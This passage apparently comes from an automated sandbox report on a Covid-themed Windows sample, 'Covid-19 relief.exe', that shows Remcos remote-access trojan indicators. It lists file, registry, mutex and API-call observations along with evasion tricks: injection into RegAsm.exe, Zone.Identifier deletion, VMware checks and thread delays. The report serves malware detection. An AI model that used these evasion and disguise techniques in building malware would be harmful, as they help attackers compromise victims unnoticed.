            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00411927
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | File created: C:\Users\user\AppData\Roaming\Covid-19
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Remcos-A380KR
            Source: Covid-19 relief.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: Covid-19 relief.exe | ReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | File read: C:\Users\user\Desktop\Covid-19 relief.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Process created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe'
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: Covid-19 relief.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Covid-19 relief.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00409908
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Code function: 1_2_00C34AC0 push eax; ret 1_2_00C34AC1
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Code function: 1_2_00C35D78 pushfd ; iretd 1_2_00C35D79
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00413ED0 push eax; ret 2_2_00413EFE
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Code function: 3_2_00D74AC0 push eax; ret 3_2_00D74AC1
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Code function: 3_2_00D75D78 pushfd ; iretd 3_2_00D75D79
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00413ED0 push eax; ret 5_2_00413EFE
            Source: initial sample | Static PE information: section name: .text entropy: 7.87913546933
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040D4E5
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | File created: C:\Users\user\AppData\Roaming\Covid-19
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00411700

            Hooking and other Techniques for Hiding and Protection:

            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | File opened: C:\Users\user\AppData\Roaming\Covid-19:Zone.Identifier read attributes | delete
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00409908
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Covid-19 relief.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004113C9 OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004113C9 OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
Source: C:\Users\user\Desktop\Covid-19 relief.exe | Window / User API: threadDelayed 389
Source: C:\Users\user\Desktop\Covid-19 relief.exe | Window / User API: threadDelayed 2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 747
Source: C:\Users\user\Desktop\Covid-19 relief.exe | Window / User API: threadDelayed 1706
Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 5616 | Thread sleep time: -48920s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4116 | Thread sleep count: 747 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4116 | Thread sleep time: -7470000s >= -30000s
Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 5948 | Thread sleep count: 321 > 30
Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 6604 | Thread sleep count: 1706 > 30
Source: C:\Users\user\Desktop\Covid-19 relief.exe TID: 6604 | Thread sleep time: -34120s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Last function: Thread delayed (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@